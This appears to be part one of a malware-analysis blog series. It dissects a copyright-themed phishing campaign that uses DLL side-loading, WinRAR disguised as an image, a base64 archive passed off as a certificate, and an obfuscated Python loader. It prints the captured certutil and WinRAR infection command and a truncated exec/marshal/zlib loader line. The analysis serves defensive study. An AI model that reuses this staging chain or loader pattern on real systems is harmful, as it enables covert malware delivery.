Introduction

Join me as we peel back layer upon layer of Python code, shellcode, and executables, each more difficult then the last all in the effort of uncovering a novel attack campaign. An operation that appears to have been orchestrated by a single threat actor who successfully evaded detection and operated entirely under the radar.

Strap in: this is the first instalment of a six-part series, with each part diving into a different stage of the malware.

This section introduces the foundational knowledge necessary for understanding Python malware reverse engineering. It explores the early-stage payload structure and simple obfuscation techniques used in the initial stages of execution.

Note: Since writing this, SentinelOne has published an excellent report covering Stages 1–5. It’s well worth a read for additional context, though the material from Stages 6–9 remains unique to this write-up, so stick around for that.


This attack begins with a phishing email that emphasises the importance of reading an attached document related to copyright infringement. However, the attachment is not a document at all it’s a ZIP archive masquerading as one.

VirusTotal reference: https://www.virustotal.com/gui/file/a3963c1f05b6c13e6e5973b1f4d0152d01e946ffaf79d9b5908d0d1f1eb5a6d1

Once unzipped, the folder reveals the following contents:

image

Filename
Detailed_report_document_on_actions_involving_copyrighted_material.exe
vcruntime140.dll
version.dll
_\Document.pdf (Hidden Folder)
_\Images.png (Hidden Folder)

The Lure: A Fake PDF

The primary lure in this attack is the file: Detailed_report_document_on_actions_involving_copyrighted_material.exe

This executable is disguised with a PDF icon and given a deliberately long filename to hide its .exe extension in file explorers, aiming to trick users into thinking it’s a legitimate document. However, the .exe extension betrays its true nature.

Running a quick hash search on VirusTotal shows that this file is, interestingly, a known (semi-legitimate) PDF reader:

hpreader.exe on VirusTotal

The executable appears to be signed and hasn’t been directly modified. This leads us to the next logical point of investigation: DLL side-loading.


What’s a DLL?

A DLL (Dynamic Link Library) is a file that contains code and data that programs can use. Think of it as a toolbox: rather than each program carrying its own tools, they share common ones (DLLs) to save space and make updates easier.

For example, a program might ask Windows to load vcruntime140.dll to make use of standard C runtime functions, such as memory allocation, string manipulation, or exception handling.


Now, What’s “Sideloading”?

Sideloading is when a program loads a DLL from the same folder it’s in, rather than from the official location (like the Windows system folder).

Attackers abuse this by:

  1. Finding a legitimate program that looks for a specific DLL.
  2. Placing a malicious version of that DLL next to the program.
  3. When the program runs, it loads the attacker’s fake DLL instead of the real one.

Because the program itself is trusted (and maybe even signed by a known company), security tools might not raise alarms as they think everything is normal.


Investigating the DLLs

When inspecting the dropped DLLs: image

  • vcruntime140.dll still has a valid Microsoft signature, so it’s likely a legitimate dependency or decoy.
  • That means we can focus our attention on the more suspicious file: version.dll.

Digging Deeper into the Hidden Files

So we have found the malicious binary version.dll, but there are two other files hidden away in a concealed folder:

  • Document.pdf
  • Images.png

Let’s take a closer look at them.


Images.png – A Familiar Signature

Opening Images.png, we quickly realise it’s not actually an image.

image Viewing it with a hex editor, we see the file begins with the familiar magic bytes:

4D 5A

That’s MZ in ASCII the signature of a Windows executable file.

Running the hash through VirusTotal and inspecting the signature confirms it:
This isn’t an image, it’s a legitimate WinRAR executable.

So why is WinRAR bundled in a phishing ZIP?

This suggests the attacker is using a Bring Your Own Binary (BYOB) technique in this case, bundling WinRAR to ensure consistent execution of their payload, regardless of what’s installed on the victim’s system.

We’ll want to keep an eye out for zipped or self-extracting archives.


Document.pdf – Suspiciously Large “Key”

Next, we inspect Document.pdf. At first, it appears to be plain text but the contents look strange: image

  • It starts with a **header resembling an base64 encoded certificate:
    • -----BEGIN CERTIFICATE-----
  • But the file is 23.4 MB, which is far too large for a certificate.
  • The contents appear to be Base64-encoded which is common for keys/certificates but could also be concealing something.

So let’s test a theory: we strip off the header and decode the base64 blob in CyberChef.

image

And there it is, decoding the base64 reveals a file beginning with:

50 4B

That’s the “PK” signature for a ZIP archive (also common to .zip, .docx, .jar, etc).


The Payload is Found

We’ve now uncovered what appears to be the Stage 2 payload, hidden inside Document.pdf under the guise of a bogus certificate.

Saving the decoded output as a .zip file and opening it reveals the second stage, now ready to be analysed.

And just like that…


Stage 2 begins.

Sandbox Execution & Process Observation

Before proceeding further, let’s validate our hypothesis by executing the original payload in a sandboxed environment.

Utilising Sysmon (and powerSIEM), we captured the following process creation event:

Type: Process Create

Image: C:\Windows\SysWOW64\cmd.exe

ParentImage: C:\Users\Malware\Desktop\sample\Detailed_report_document_on_actions_involving_copyrighted_material.exe

CommandLine: cmd /c cd _ && start Document.pdf && certutil -decode Document.pdf Invoice.pdf && images.png x -ibck -y Invoice.pdf C:\Users\Public && start C:\Users\Public\Windows\svchost.exe C:\Users\Public\Windows\Lib\images.png ADN_UZJomrp3vPMujoH4bot

Step-by-Step Breakdown of the Command

Let’s unpack this command step-by-step:

start Document.pdf

  • Opens the file Document.pdf with the default PDF viewer.
  • This action distracts the user; however, since this is actually an encoded zip file, the PDF viewer displays an error.

certutil -decode Document.pdf Invoice.pdf

  • Decodes the encoded Document.pdf into Invoice.pdf.
  • certutil is a windows binary making this a cleaver use of a LOLBIN to decode it’s payload.

images.png x -ibck -y Invoice.pdf C:\Users\Public\Windows

  • Remember images.png is WinRar, this extracts the contents of the decoded Invoice.pdf (a disguised archive).
  • Files are placed into C:\Users\Public\Windows.

start C:\Users\Public\Windows\svchost.exe C:\Users\Public\Windows\Lib\images.png ADN_UZJomrp3vPMujoH4bot

  • Executes the extracted payload svchost.exe from C:\Users\Public\Windows.

Onto Stage 2

Upon examining the command captured by Sysmon, we notice two files that are new to this stage:

start C:\Users\Public\Windows\svchost.exe C:\Users\Public\Windows\Lib\images.png ADN_UZJomrp3vPMujoH4bot

From this, we can assume:

  • svchost.exe and images.png are part of the Stage 2 payload
  • A variable or argument (ADN_UZJomrp3vPMujoH4bot) is passed in, possibly a key or ID?

svchost.exe – A Familiar Name, but Suspicious Behaviour

Despite the name, this isn’t the real Windows svchost.exe. Checking the signature reveals it’s signed by:

Python Software Foundation

That’s a strong clue and VirusTotal confirms it’s the legitimate pythonw.exe, a version of Python that runs silently (no console window), often used for running background scripts.


images.png – Obfuscated Python Script

Opening images.png in a hex editor reveals it’s actually Python code albeit heavily obfuscated.
image

To make things easier, we rename it to stage2.py so we can explore it with syntax highlighting in VSCode.


Obfuscation & Dynamic Execution

Skimming the file, we find a large number of dummy variables and unused functions, a very basic form of obfuscation.

image

But buried in the middle, we see the key payload trigger:

exec(__import__('marshal').loads(__import__('zlib').decompress(__import__('base64').b85decode("c$|ee*>>VcmVoh+&b9W+s_L$Gd..............")

Breaking this down:

  • exec() is used to dynamically run code at runtime
  • marshal is used to load precompiled Python bytecode
  • zlib is decompressing it
  • And interestingly, it uses Base85 encoding, a less common alternative to Base64

What’s Python Bytecode?

You might not be familiar with Python bytecode after all, Python is typically known as an interpreted language. Bytecode files aren’t particularly common in malware analysis, so here’s a quick primer:

  • .py files are Python source code,human-readable and editable.
  • .pyc files are compiled bytecode, automatically generated when a .py script is run.
  • Bytecode is faster for the Python interpreter to execute, but it’s not human-readable.
  • To reverse it back into source code, we’ll need tools like uncompyle6, or use dis to view a disassembled version of the bytecode.

Understanding the difference between source code and bytecode is crucial for progressing with the analysis in Stage 3.


Conclusion

Through the analysis of Stage 1 and 2, we’ve uncovered the attacker’s initial strategy: leveraging trusted binaries, sideloaded DLLs, and cleverly disguised payloads to establish execution without raising suspicion. From the fake PDF lure to the use of certutil, WinRAR, and embedded Python scripts, it’s clear this campaign was designed to operate quietly and effectively under the radar.

By the end of this stage, we’ve identified how the payloads are obfuscated, staged, and executed using legitimate tools in unintended ways. Most importantly, we’ve decoded the structure and intent behind the initial infection vector, providing a strong foundation for deeper memory-focused analysis.


Up Next: Stage 3 – Dissecting In-Memory Python Bytecode

In Part 2, we’ll step into the world of in-memory execution. We’ll decode the Base85-encoded bytecode, reverse engineered the custom cryptographic loader, and uncover how the attacker dynamically executes Python payloads without ever touching disk.

We’ll also look at:

  • Disassembling Python bytecode with dis
  • Rebuilding encryption logic from marshalled code
  • Extracting runtime payloads from obfuscated blobs
  • Reversing Multiple layers of encryption and obfuscation

Get ready for a deep dive into the mechanics of bytecode analysis and memory-only payload execution.